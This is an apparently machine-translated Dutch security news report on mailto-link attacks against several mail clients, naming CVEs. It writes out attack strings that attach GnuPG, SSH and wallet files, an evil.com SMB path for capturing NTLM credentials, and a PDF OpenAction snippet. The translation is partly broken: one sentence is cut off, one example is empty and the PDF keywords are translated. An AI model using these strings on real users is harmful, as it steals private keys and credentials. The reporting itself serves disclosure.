Onderzoekers van de Ruhr Universiteit Bochum (Duitsland)
Links «
Mailclients Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) en Pegasus Mail waren kwetsbaar voor een triviale aanval waarmee u automatisch bijlagen kunt toevoegen elk lokaal bestand, gespecificeerd via een link zoals “mailto:?attach=path_to_file”. Het bestand wordt bijgevoegd zonder dat er een waarschuwing wordt weergegeven, dus zonder speciale aandacht merkt de gebruiker mogelijk niet dat de brief met een bijlage wordt verzonden.
Als u bijvoorbeeld een link als ‘mailto:[e-mail beveiligd]&subject=Titel&body=Tekst&attach=~/.gnupg/secring.gpg" kunt u privésleutels van GnuPG in de brief invoegen. U kunt ook de inhoud van crypto-wallets (~/.bitcoin/wallet.dat), SSH-sleutels (~/.ssh/id_rsa) en alle bestanden die voor de gebruiker toegankelijk zijn, verzenden. Bovendien kunt u met Thunderbird groepen bestanden bijvoegen via een masker met behulp van constructies als “attach=/tmp/*.txt”.
Naast lokale bestanden verwerken sommige e-mailclients koppelingen naar netwerkopslag en paden op de IMAP-server. Met IBM Notes kunt u met name een bestand uit een netwerkmap overbrengen bij het verwerken van koppelingen zoals “attach=\\evil.com\dummyfile”, en kunt u NTLM-authenticatieparameters onderscheppen door een koppeling te sturen naar een SMB-server die wordt beheerd door de aanvaller (het verzoek wordt verzonden met de huidige authenticatieparameters van de gebruiker).
Thunderbird verwerkt met succes verzoeken zoals “attach=imap:///fetch>UID>/INBOX>1/”, waarmee u inhoud uit mappen op de IMAP-server kunt bijvoegen. Tegelijkertijd worden berichten die zijn opgehaald uit IMAP, gecodeerd via OpenPGP en S/MIME, automatisch gedecodeerd door de e-mailclient voordat ze worden verzonden. De ontwikkelaars van Thunderbird waren dat wel
Oude versies van Thunderbird waren ook kwetsbaar voor twee andere door de onderzoekers voorgestelde aanvalsvarianten op PGP en S/MIME. In het bijzonder werden Thunderbird, evenals OutLook, PostBox, eM Client, MailMate en R2Mail2, onderworpen aan een sleutelvervangingsaanval, veroorzaakt door het feit dat de e-mailclient automatisch nieuwe certificaten importeert en installeert die worden verzonden in S/MIME-berichten, waardoor de aanvaller om vervanging van openbare sleutels te organiseren die al door de gebruiker zijn opgeslagen.
De tweede aanval, waarvoor Thunderbird, PostBox en MailMate vatbaar zijn, manipuleert de kenmerken van het mechanisme voor het automatisch opslaan van conceptberichten en maakt het mogelijk om, met behulp van mailto-parameters, de ontsleuteling van gecodeerde berichten of de toevoeging van een digitale handtekening voor willekeurige berichten te initiëren, met daaropvolgende verzending van het resultaat naar de IMAP-server van de aanvaller. Bij deze aanval wordt de cijfertekst verzonden via de parameter ‘body’ en wordt de tag ‘meta refresh’ gebruikt om een oproep naar de IMAP-server van de aanvaller te initiëren. Bijvoorbeeld: ' '
Om “mailto:”-links automatisch te verwerken zonder tussenkomst van de gebruiker, kunnen speciaal ontworpen PDF-documenten worden gebruikt. Met de actie OpenAction in PDF kunt u automatisch de mailto-handler starten bij het openen van een document:
%PDF-1.5
1 0 obj
<< /Type /Catalogus /OpenActie [2 0 R] >>
endobj
2 0 obj
<< /Type /Actie /S /URI/URI (mailto:?body=——BEGIN PGP-BERICHT——[…])>>
endobj
Bron: opennet.ru